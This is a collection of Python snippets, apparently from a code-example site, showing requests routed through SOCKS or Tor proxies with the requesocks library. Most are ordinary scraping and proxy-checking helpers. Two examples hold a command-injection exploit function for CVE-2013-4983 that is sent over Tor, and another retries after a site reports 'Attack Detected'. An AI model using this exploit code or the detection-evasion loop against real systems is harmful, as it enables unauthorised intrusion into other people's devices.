def getip_requesocks(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://14.63.227.176:9050',
        'https': 'socks5://14.63.227.176:9050'
    }
    r = session.get(url)
    ip = r.text.replace("\n", "")
    requests.get("http://192.168.0.48/add_ip/%s" % ip)
    print "(+) IP is: " + ip
Example 41
    def process(self,input,output,year,PROXY=None):
        session = requests.session()
        if PROXY is not None:
            session.proxies = {'http': 'socks5://'+PROXY}
        out = None

        for hcode, title in codes:

            fmt = {'year':year,'hcode':hcode }

            item_codes = session.get(CodesURL % fmt).text
            item_codes = CodesRE.findall(item_codes)
            print item_codes

            if out is None:
                out = csv.writer(file(output,"w"))
                done = False
                first = 0
                while not done:
                    url = "http://www.obudget.org/api/supports/00/{0}?limit=1000&first={1}".format(year,first)
                    rows = real_requests.get(url).json()
                    rows = [ [ unicode(y).encode('utf8') for y  in [x['year'], '', x['subject'], x['code'][2:],
                                                                x['recipient'], x['kind'],
                                                                x['title'], 0, 0, 0]] for x in rows ]
                    out.writerows(rows)
                    done = len(rows)==0
                    first += 1000

            for item_code in item_codes:
                fmt['code'] = item_code

                print year,hcode,title.encode('utf8'),item_code

                for i in range(10):
                    try:
                       frame = session.get(DataURL % fmt).text
                       break
                    except:
                       time.sleep(60)
                       pass
                frame = pq(frame)
                for row in frame("TR"):
                    row = pq(row)
                    _row = [year,hcode,title.encode('utf8'),item_code]
                    for x in row("TD.x3_0, TD.x3_1, TD.x2_0, TD.x2_1"):
                        x=pq(x)
                        x=x.text()
                        try:
                            _row.append(int(x.replace(",","")))
                        except:
                            _row.append(x.encode('utf8'))
                    if len(_row) > 4:
                        out.writerow(_row)
                        print _row
Example 42
	def __init__(self, port, location, key):
		self.ssh = Popen(['ssh', '-o UserKnownHostsFile=/dev/null', '-o StrictHostKeyChecking=no', '-t', '-t', '-D', str(port), '-i', key, location, '> /dev/null 2>&1'])
		self.session = requesocks.session()
		self.session.proxies = {'http': 'socks5://127.0.0.1:%d' % port, 'https': 'socks5://127.0.0.1:%d' % port}
		# hang until connection established
		while True:
			try:
				self.session.get('http://timeschedules.uchicago.edu/').text
			except:
				continue
			break
Example 43
def inject_command(ip, payload):
    """ Actually does the exploitation of CVE-2013-4983 to inject out payload """
    url = "https://%s/end-user/index.php?c=blocked&action=continue" % (ip)
    body = "url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d"
    body += "&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo"
    body += "&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b"
    body += payload
    body += "&raw_category_id=one%7ctwo%7cthree%7cfour"
    session = requesocks.session()
    session.proxies = {"http": "socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}
    session.post(url, data=body, verify=False)
Example 44
    def whoami(self):
        """
        This is a check to make sure the proxy is working.
        """

        IPCHICKEN = "http://www.ipchicken.com"
        session = requesocks.session()
        session.proxies = self.session_proxies
        response = session.get(IPCHICKEN, headers=self.request_params)
        soup = BS(response.content, 'html.parser')
        return soup.find_all('p')[1].find('b').next.replace(' ', '').replace(
            '\n', '')
Example 45
def getip_requesocks(url):
    try:
        print "(+) Sending request with requesocks..."
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:9050',
        'https': 'socks5://127.0.0.1:9050'}
        r = session.get(url,timeout = 30)
        print "(+) tor_IP is: " + r.text.replace("\n", "")
        return  r.text.replace("\n", "")
    except Exception,e:
        print Exception,e
        return -1
Example 46
def get_page(url):
    """
    Get the content of the url by using BeautifulSoup
    """
    try:
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:9050',
                           'https': 'socks5://127.0.0.1:9050'}
        response = session.get(url, timeout=5)
        return bs4.BeautifulSoup(response.text)
    except Exception, e:
        return get_page(url)
Example 47
def get(url):
    logging.info('GET: %s' % url)
    try:
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://localhost:9050',
            'https': 'socks5://localhost:9050',
        }
        r = session.get(url)
        return r.text
    except:
        return None
Example 48
def fetch_search_results( base_url, sub, query=None, minAsk=None, maxAsk=None, bedrooms=None):
    search_params = {
        key: val for key, val in locals().items() if val is not None
    }

    base = base_url + sub
    #resp = requests.get(base, params=search_params, timeout=3)
    reset_socks()
    session = requests.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}
    resp = session.get(base,timeout=10)
    resp.raise_for_status()  # <- no-op if status==200
    return resp.content, resp.encoding
Example 49
def select_session(configs):

    if 'proxies' in configs:
        session = requesocks.session()
        proxy = configs['proxies'][0]
        session.proxies = {
            'http': 'socks4://%s:%d' % (proxy['address'], proxy['port']),
            'https': 'socks4://%s:%d' % (proxy['address'], proxy['port']),
        }
    else:
        session = requests.session()

    return session
Example 50
def select_session(configs):

    if 'proxies' in configs:
        session = requesocks.session()
        proxy = configs['proxies'][0]
        session.proxies = {
                'http': 'socks4://%s:%d' % (proxy['address'],proxy['port']),
                'https': 'socks4://%s:%d' % (proxy['address'],proxy['port']),
        }
    else:
        session = requests.session()

    return session
Example 51
def inject_command(ip, payload):
    """ Actually does the exploitation of CVE-2013-4983 to inject out payload """
    url = "https://%s/end-user/index.php?c=blocked&action=continue" % (ip)
    body = "url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d"
    body += "&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo"
    body += "&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b"
    body += payload
    body += "&raw_category_id=one%7ctwo%7cthree%7cfour"
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://127.0.0.1:9050',
        'https': 'socks5://127.0.0.1:9050'
    }
    session.post(url, data=body, verify=False)
Example 52
def getip_requesocks(url):
    try:
        print "(+) Sending request with requesocks..."
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://127.0.0.1:9050',
            'https': 'socks5://127.0.0.1:9050'
        }
        r = session.get(url, timeout=30)
        print "(+) tor_IP is: " + r.text.replace("\n", "")
        return r.text.replace("\n", "")
    except Exception, e:
        print Exception, e
        return -1
Example 53
def get_page(url):
    """
    Get the content of the url by using BeautifulSoup
    """
    try:
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://127.0.0.1:9050',
            'https': 'socks5://127.0.0.1:9050'
        }
        response = session.get(url, timeout=5)
        return bs4.BeautifulSoup(response.text)
    except Exception, e:
        return get_page(url)
Example 54
 def get_pages(self, sleep_time, proxy=False):
     # have to run tor before the proxy option will work
     self.html_content[self.city_state] = []
     if proxy == True:
         session = requesocks.session()
         session.proxies = self.session_proxies
         for url in self.urls:
             time.sleep(sleep_time)
             response = session.get(url, headers=self.request_params)
             self.html_content[self.city_state].append(response.content)
     else:  # the default is no proxy
         for url in self.urls:
             time.sleep(sleep_time)
             response = requests.get(url, headers=self.request_params)
             self.html_content[self.city_state].append(response.content)
Example 55
def tor_request(url, num_iter=3):
    sessions = requesocks.session()
    sessions.proxies = {
        'http': 'socks5://localhost:9050',
        'https': 'socks5://localhost:9050'
    }
    try:
        with Controller.from_port(port=9051) as controller:
            controller.authenticate()
            for i in range(num_iter):
                s = sessions.get(BASE_URL)
                if s.status_code == 200:
                    _parse_and_print_response(s)
                controller.signal(Signal.NEWNYM)
                time.sleep(2)
                print("- refresh -")
    except SocketError, e:
        print(e, '\nPlease start Tor first.')
Example 56
def testSocks5(proxyHost, urlType):
    start_time = time.time()
    global timeoutTime
    #print "Testing socks proxy: http://"+proxyHost
    import socks
    import socket
    import urllib2
    hostNo = proxyHost.split(":")[0]
    portNo = proxyHost.split(":")[1]

    proxyTypeList = []
    proxyTypeList.append("socks5")

    for proxyType in proxyTypeList:
        session = requesocks.session()
        session.timeout = timeoutTime
        if proxyType == "socks5":
            if urlType == "https":
                urlPosition = urlList[0]
                session.proxies = {
                    'https': 'socks5://' + hostNo + ':' + portNo
                }
            else:
                urlPosition = urlList[1]
                session.proxies = {'http': 'socks5://' + hostNo + ':' + portNo}
        try:

            url = urlPosition[0]
            urlTitle = urlPosition[1]

            r = session.get(url)

            statusCode = str(r.status_code)

            if statusCode == "200":
                result = ((proxyHost, "", proxyType))
                resultList.append(result)
                if proxyType == "socks5":
                    end_time = time.time() - start_time
                    return proxyHost + "\tsocks5\t200\t" + str(end_time)
            else:
                return proxyHost + "\t" + proxyType + "\t" + statusCode
        except Exception as e:
            return proxyHost + "\t" + proxyType + "\t503"
Example 57
def Worker(task, useTOR=False):
	bytesRead=0
	httpCodes=[0]*5
	urlList=[]
	start=time()
	errors=0

	if useTOR:
		import requesocks
		session=requesocks.session()
		session.proxies={	"http" : 	"socks5://127.0.0.1:9050",
							"https" : 	"socks5://127.0.0.1:9050"}
	else:
		session=requests.Session()

	for t in task:
		urls=[]
		host=t[0]
		for path in t[1]:
			url="http://"+host+path
			try:
				if useTOR:
					r=session.get(url, timeout=3.0, prefetch=False, allow_redirects=True)
				else:
					r=session.get(url, timeout=3.0, stream=True, allow_redirects=True)
			except Exception as ex:
				errors+=1
				break

			httpCodes[(r.status_code/100)-1]+=1
			if r.status_code!=200 or not ValidResponse(r):
				errors+=1
				continue

			try:
				size, urls=ReadResponse(r, host)
			except:
				errors+=1
				continue
			bytesRead+=size
			urlList.extend(urls)

	return urlList, float("%.2f" % (time()-start)), bytesRead, errors, httpCodes, useTOR
Example 58
def realiza_peticion(key, id_candidato, tor=False, timeout=2):
    """Realiza una peticion a una de las apis. Devuelve la
    respuesta (json) como un diccionario"""
    payload = genera_mensaje(id_candidato)
    url = _dic_urls[key]
    kargs = {
        "data": json.dumps(payload),
        "headers": _headers,
        "timeout": timeout
    }
    while True:
        try:
            if tor is True:
                tor_req = req_socks.session()
                tor_req.proxies = _tor_proxies
                r = tor_req.post(url, **kargs)
            else:
                r = req.post(url, **kargs)
        except req.exceptions.Timeout:
            imprime("Timeout error")
            continue
        except req.exceptions.ConnectionError as error:
            errno = error.errno
            err_msg = "ConnectionError"
            if errno == 101:
                err_msg += (": Esta conectado a internet?")
            imprime(err_msg)
            time.sleep(0.5)
            continue
        except Exception as e:
            imprime("Excepcion: " + str(e))
            time.sleep(0.5)
            continue
        else:
            if r.text.find("Attack Detected") != -1:
                imprime(r.text)
                imprime("Ataque detectado!! A dormir")
                time.sleep(60)
                continue
            if hasattr(r, 'json'):
                return r.json()
            else:
                return json.loads(r.content)